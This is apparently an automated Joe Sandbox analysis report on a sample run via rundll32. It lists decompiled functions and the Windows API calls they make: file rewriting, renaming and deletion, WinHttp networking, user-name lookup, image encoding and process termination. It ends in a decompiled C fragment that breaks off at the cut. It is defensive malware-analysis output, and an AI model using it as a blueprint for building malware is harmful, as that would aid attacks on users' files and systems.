Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C13A60, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97

APIs

VirtualQuery.KERNEL32 ref: 63C13B43

Part of subcall function 63C13A00: fwrite.MSVCRT ref: 63C13A2B
Part of subcall function 63C13A00: vfprintf.MSVCRT ref: 63C13A47
Part of subcall function 63C13A00: abort.MSVCRT ref: 63C13A4C
Part of subcall function 63C13A00: VirtualQuery.KERNEL32 ref: 63C13B0A
Part of subcall function 63C13A00: memcpy.MSVCRT ref: 63C13B71
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13BA5
Part of subcall function 63C13A00: memcpy.MSVCRT ref: 63C13BBD
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13BEB
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13C35
Part of subcall function 63C13A00: GetLastError.KERNEL32 ref: 63C13C4A
Part of subcall function 63C13A00: VirtualQuery.KERNEL32 ref: 63C13E47
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13E78

Strings

Om>w, xrefs: 63C13AFD, 63C13C04
VirtualQuery failed for %d bytes at address %p, xrefs: 63C13C77, 63C13CA3
Address %p has no image-section, xrefs: 63C13C8B

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 002332CC, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

GetUserNameExW.SECUR32 ref: 00233307
calloc.MSVCRT ref: 00233324
calloc.MSVCRT ref: 00233338
GetUserNameExW.SECUR32 ref: 00233352
realloc.MSVCRT ref: 0023339C
free.MSVCRT ref: 002333BF
free.MSVCRT ref: 002333C7

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00231859, Relevance: 10.6, APIs: 7, Instructions: 73

APIs

memset.MSVCRT ref: 00231884
memset.MSVCRT ref: 002318EA

Part of subcall function 002310B0: calloc.MSVCRT ref: 002310F6
Part of subcall function 002310B0: calloc.MSVCRT ref: 0023110E
Part of subcall function 002310B0: calloc.MSVCRT ref: 00231128
Part of subcall function 002310B0: calloc.MSVCRT ref: 00231140
Part of subcall function 002310B0: time.MSVCRT ref: 00231150
Part of subcall function 002310B0: srand.MSVCRT ref: 00231158
Part of subcall function 002310B0: wcscmp.MSVCRT ref: 00231186
Part of subcall function 002310B0: CreateFileW.KERNEL32 ref: 0023121F
Part of subcall function 002310B0: GetFileSize.KERNEL32 ref: 0023123E
Part of subcall function 002310B0: SetFilePointer.KERNEL32 ref: 0023129C
Part of subcall function 002310B0: WriteFile.KERNEL32 ref: 002312CE
Part of subcall function 002310B0: SetFilePointer.KERNEL32 ref: 00231305
Part of subcall function 002310B0: WriteFile.KERNEL32 ref: 0023133B
Part of subcall function 002310B0: SetFilePointer.KERNEL32 ref: 0023137B
Part of subcall function 002310B0: SetEndOfFile.KERNEL32 ref: 00231387
Part of subcall function 002310B0: CloseHandle.KERNEL32 ref: 00231393
Part of subcall function 002310B0: _wsplitpath.MSVCRT ref: 002313D6
Part of subcall function 002310B0: rand.MSVCRT ref: 002313E5
Part of subcall function 002310B0: rand.MSVCRT ref: 00231400
Part of subcall function 002310B0: wcscmp.MSVCRT ref: 00231457
Part of subcall function 002310B0: MoveFileW.KERNEL32 ref: 002314CC
Part of subcall function 002310B0: memset.MSVCRT ref: 002314F2
Part of subcall function 002310B0: DeleteFileW.KERNEL32 ref: 002314FE
Part of subcall function 002310B0: GetLastError.KERNEL32 ref: 00231510
Part of subcall function 002310B0: free.MSVCRT ref: 0023151F
Part of subcall function 002310B0: free.MSVCRT ref: 0023152B
Part of subcall function 002310B0: free.MSVCRT ref: 00231537
Part of subcall function 002310B0: free.MSVCRT ref: 00231543

FindNextFileW.KERNEL32 ref: 0023192A
memset.MSVCRT ref: 00231950
memset.MSVCRT ref: 0023196C
free.MSVCRT ref: 00231974
free.MSVCRT ref: 0023197C
free.MSVCRT ref: 00231997
free.MSVCRT ref: 002319A3

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C08880, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68

APIs

wcslen.MSVCRT ref: 63C08898
SHGetSpecialFolderPathW.SHELL32 ref: 63C08902
wcslen.MSVCRT ref: 63C08916
_wcsicmp.MSVCRT ref: 63C0893D
wcslen.MSVCRT ref: 63C08977

Strings

\, xrefs: 63C08923

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 0022FB89, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36

APIs

free.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000001,00000000,773DC380,0023A0E9), ref: 0022FB07
realloc.MSVCRT ref: 0022FBC9
strlen.MSVCRT ref: 0022FBD9
memcpy.MSVCRT ref: 0022FBEC

Strings

meou, xrefs: 0022FBA9
<ti, xrefs: 0022FBC2

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022FBF9, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34

APIs

free.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000001,00000000,773DC380,0023A0E9), ref: 0022FB07
realloc.MSVCRT ref: 0022FBC9
strlen.MSVCRT ref: 0022FBD9
memcpy.MSVCRT ref: 0022FBEC

Strings

re>, xrefs: 0022FC0F
<ti, xrefs: 0022FBC2

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022EAE0, Relevance: 10.2, APIs: 8, Instructions: 209

APIs

Part of subcall function 00227460: WaitForSingleObject.KERNEL32 ref: 00227488
Part of subcall function 00227460: SetEvent.KERNEL32 ref: 00227512

free.MSVCRT ref: 0022EB7B
free.MSVCRT ref: 0022EB87
free.MSVCRT ref: 0022EB93
free.MSVCRT ref: 0022EDAF

Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D01E
Part of subcall function 0022CFD0: memcpy.MSVCRT ref: 0022D05C
Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D0A2

Sleep.KERNEL32 ref: 0022EBA9

Part of subcall function 0022D930: rand.MSVCRT ref: 0022DA10
Part of subcall function 0022D930: free.MSVCRT ref: 0022DABF

Part of subcall function 0022D210: rand.MSVCRT ref: 0022D22F
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D244
Part of subcall function 0022D210: rand.MSVCRT ref: 0022D251
Part of subcall function 0022D210: free.MSVCRT ref: 0022D2B3
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D306
Part of subcall function 0022D210: free.MSVCRT ref: 0022D33C
Part of subcall function 0022D210: free.MSVCRT ref: 0022D344
Part of subcall function 0022D210: free.MSVCRT ref: 0022D378
Part of subcall function 0022D210: free.MSVCRT ref: 0022D384

Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D4E8
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D4FD
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D520
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D539
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D624
Part of subcall function 0022D4A0: strlen.MSVCRT ref: 0022D66C
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D6ED
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7A9
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7BD
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7C5
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D84D
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D85E

Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E102
Part of subcall function 0022E080: calloc.MSVCRT ref: 0022E11F
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E129
Part of subcall function 0022E080: memcpy.MSVCRT ref: 0022E13B
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E143
Part of subcall function 0022E080: MultiByteToWideChar.KERNEL32 ref: 0022E17F
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E1EE
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E201
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E235
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E245
Part of subcall function 0022E080: free.MSVCRT ref: 0022E25E
Part of subcall function 0022E080: GetModuleHandleW.KERNEL32 ref: 0022E2E7
Part of subcall function 0022E080: WinHttpOpen.WINHTTP(?,?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E321
Part of subcall function 0022E080: WinHttpSetOption.WINHTTP ref: 0022E363
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0022E391
Part of subcall function 0022E080: WinHttpSetTimeouts.WINHTTP ref: 0022E3C6
Part of subcall function 0022E080: GetLastError.KERNEL32 ref: 0022E3E0
Part of subcall function 0022E080: free.MSVCRT ref: 0022E3FE

Part of subcall function 0022D3A0: calloc.MSVCRT ref: 0022D3C6
Part of subcall function 0022D3A0: free.MSVCRT(?,?,?,?,?,?,00000000,?,?,0022E57B), ref: 0022D3FB
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D45F
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D46B
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D485

Part of subcall function 0022DB10: free.MSVCRT ref: 0022DBFF
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC1E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC5E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC7B
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC99
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DCA3

Part of subcall function 0022D0B0: memcpy.MSVCRT ref: 0022D13A
Part of subcall function 0022D0B0: calloc.MSVCRT ref: 0022D159

free.MSVCRT ref: 0022ED81
free.MSVCRT ref: 0022ED8D
free.MSVCRT ref: 0022ED99

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022EB67, Relevance: 10.1, APIs: 8, Instructions: 148

APIs

free.MSVCRT ref: 0022EB7B
free.MSVCRT ref: 0022EB87
free.MSVCRT ref: 0022EB93
Sleep.KERNEL32 ref: 0022EBA9
free.MSVCRT ref: 0022EDAF

Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D01E
Part of subcall function 0022CFD0: memcpy.MSVCRT ref: 0022D05C
Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D0A2

Part of subcall function 0022D930: rand.MSVCRT ref: 0022DA10
Part of subcall function 0022D930: free.MSVCRT ref: 0022DABF

Part of subcall function 0022D210: rand.MSVCRT ref: 0022D22F
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D244
Part of subcall function 0022D210: rand.MSVCRT ref: 0022D251
Part of subcall function 0022D210: free.MSVCRT ref: 0022D2B3
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D306
Part of subcall function 0022D210: free.MSVCRT ref: 0022D33C
Part of subcall function 0022D210: free.MSVCRT ref: 0022D344
Part of subcall function 0022D210: free.MSVCRT ref: 0022D378
Part of subcall function 0022D210: free.MSVCRT ref: 0022D384

Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D4E8
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D4FD
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D520
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D539
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D624
Part of subcall function 0022D4A0: strlen.MSVCRT ref: 0022D66C
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D6ED
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7A9
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7BD
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7C5
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D84D
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D85E

Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E102
Part of subcall function 0022E080: calloc.MSVCRT ref: 0022E11F
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E129
Part of subcall function 0022E080: memcpy.MSVCRT ref: 0022E13B
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E143
Part of subcall function 0022E080: MultiByteToWideChar.KERNEL32 ref: 0022E17F
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E1EE
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E201
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E235
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E245
Part of subcall function 0022E080: free.MSVCRT ref: 0022E25E
Part of subcall function 0022E080: GetModuleHandleW.KERNEL32 ref: 0022E2E7
Part of subcall function 0022E080: WinHttpOpen.WINHTTP(?,?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E321
Part of subcall function 0022E080: WinHttpSetOption.WINHTTP ref: 0022E363
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0022E391
Part of subcall function 0022E080: WinHttpSetTimeouts.WINHTTP ref: 0022E3C6
Part of subcall function 0022E080: GetLastError.KERNEL32 ref: 0022E3E0
Part of subcall function 0022E080: free.MSVCRT ref: 0022E3FE

Part of subcall function 0022D3A0: calloc.MSVCRT ref: 0022D3C6
Part of subcall function 0022D3A0: free.MSVCRT(?,?,?,?,?,?,00000000,?,?,0022E57B), ref: 0022D3FB
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D45F
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D46B
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D485

Part of subcall function 0022DB10: free.MSVCRT ref: 0022DBFF
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC1E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC5E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC7B
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC99
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DCA3

Part of subcall function 0022D0B0: memcpy.MSVCRT ref: 0022D13A
Part of subcall function 0022D0B0: calloc.MSVCRT ref: 0022D159

free.MSVCRT ref: 0022ED81
free.MSVCRT ref: 0022ED8D
free.MSVCRT ref: 0022ED99

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022E660, Relevance: 9.1, APIs: 6, Instructions: 143

APIs

Part of subcall function 0022D930: rand.MSVCRT ref: 0022DA10
Part of subcall function 0022D930: free.MSVCRT ref: 0022DABF

free.MSVCRT ref: 0022E6C7
free.MSVCRT ref: 0022E6D3

Part of subcall function 0022D210: rand.MSVCRT ref: 0022D22F
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D244
Part of subcall function 0022D210: rand.MSVCRT ref: 0022D251
Part of subcall function 0022D210: free.MSVCRT ref: 0022D2B3
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D306
Part of subcall function 0022D210: free.MSVCRT ref: 0022D33C
Part of subcall function 0022D210: free.MSVCRT ref: 0022D344
Part of subcall function 0022D210: free.MSVCRT ref: 0022D378
Part of subcall function 0022D210: free.MSVCRT ref: 0022D384

Sleep.KERNEL32 ref: 0022E6EA

Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D4E8
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D4FD
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D520
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D539
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D624
Part of subcall function 0022D4A0: strlen.MSVCRT ref: 0022D66C
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D6ED
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7A9
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7BD
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7C5
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D84D
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D85E

Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E102
Part of subcall function 0022E080: calloc.MSVCRT ref: 0022E11F
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E129
Part of subcall function 0022E080: memcpy.MSVCRT ref: 0022E13B
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E143
Part of subcall function 0022E080: MultiByteToWideChar.KERNEL32 ref: 0022E17F
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E1EE
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E201
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E235
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E245
Part of subcall function 0022E080: free.MSVCRT ref: 0022E25E
Part of subcall function 0022E080: GetModuleHandleW.KERNEL32 ref: 0022E2E7
Part of subcall function 0022E080: WinHttpOpen.WINHTTP(?,?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E321
Part of subcall function 0022E080: WinHttpSetOption.WINHTTP ref: 0022E363
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0022E391
Part of subcall function 0022E080: WinHttpSetTimeouts.WINHTTP ref: 0022E3C6
Part of subcall function 0022E080: GetLastError.KERNEL32 ref: 0022E3E0
Part of subcall function 0022E080: free.MSVCRT ref: 0022E3FE

Part of subcall function 0022D3A0: calloc.MSVCRT ref: 0022D3C6
Part of subcall function 0022D3A0: free.MSVCRT(?,?,?,?,?,?,00000000,?,?,0022E57B), ref: 0022D3FB
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D45F
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D46B
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D485

Part of subcall function 0022DB10: free.MSVCRT ref: 0022DBFF
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC1E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC5E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC7B
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC99
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DCA3

Part of subcall function 0022D0B0: memcpy.MSVCRT ref: 0022D13A
Part of subcall function 0022D0B0: calloc.MSVCRT ref: 0022D159

realloc.MSVCRT ref: 0022E7FE
free.MSVCRT ref: 0022E827
free.MSVCRT ref: 0022E833

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00230E20, Relevance: 9.1, APIs: 6, Instructions: 82

APIs

GetFileAttributesExW.KERNEL32(?,?,?,00000000,002302A2), ref: 00230E68
CreateFileW.KERNEL32 ref: 00230EC4
CreateFileMappingW.KERNEL32 ref: 00230F08
MapViewOfFile.KERNEL32 ref: 00230F3A
CloseHandle.KERNEL32 ref: 00230F4E
CloseHandle.KERNEL32 ref: 00230F5E

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022F549, Relevance: 9.1, APIs: 6, Instructions: 76

APIs

free.MSVCRT ref: 0022F498

Part of subcall function 0022F1E0: WaitForSingleObject.KERNEL32 ref: 0022F210
Part of subcall function 0022F1E0: SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F238
Part of subcall function 0022F1E0: Sleep.KERNEL32(?,?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F244
Part of subcall function 0022F1E0: calloc.MSVCRT ref: 0022F268
Part of subcall function 0022F1E0: SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F29B

GetTickCount.KERNEL32 ref: 0022F3FD
GetTickCount.KERNEL32 ref: 0022F40F
Sleep.KERNEL32 ref: 0022F420
PeekNamedPipe.KERNEL32 ref: 0022F469

Part of subcall function 0022F2D0: WaitForSingleObject.KERNEL32 ref: 0022F2E8
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F2FB
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F315
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F32E
Part of subcall function 0022F2D0: TerminateProcess.KERNEL32 ref: 0022F350

realloc.MSVCRT ref: 0022F505
ReadFile.KERNEL32 ref: 0022F532
WaitForSingleObject.KERNEL32 ref: 0022F55E

Part of subcall function 002215B0: GetTickCount.KERNEL32 ref: 002215B8

free.MSVCRT ref: 0022F5C8

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00234080, Relevance: 9.1, APIs: 6, Instructions: 71

APIs

GdipGetImageEncodersSize.GDIPLUS ref: 002340AA
malloc.MSVCRT ref: 002340C1
GdipGetImageEncoders.GDIPLUS(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,002342C7), ref: 002340DF
wcscmp.MSVCRT ref: 00234107
free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,002342C7), ref: 0023412E
free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,002342C7), ref: 00234143

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 002331F9, Relevance: 8.8, APIs: 7, Instructions: 99

APIs

memset.MSVCRT ref: 0023302A
memset.MSVCRT ref: 0023307E
memset.MSVCRT ref: 002330D2
memset.MSVCRT ref: 00233112
calloc.MSVCRT ref: 0023317B
free.MSVCRT ref: 00233198
free.MSVCRT ref: 002331A0

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C08990, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62

C-Code - Quality: 16%

			E63C08990(void* _a4) {
				char _v532;
				intOrPtr _v552;
				int _t21;
				wchar_t* _t24;
				wchar_t* _t25;
				void* _t29;
				void* _t32;
				signed char _t33;
				void* _t41;
				void* _t42;
				void** _t43;

				_t43 = _t42 - 0x220;
				_t41 = _a4;
				if(_t41 == 0) {
					L2:
					return 1;
				} else {
					 *_t43 = _t41;
					_t21 = wcslen(??);
					if(_t21 <= 0x103) {
						_t3 = _t21 + 2; // 0x2
						_t33 = _t21 + _t3;
						_t32 =  &_v532;
						if(_t33 >= 4) {
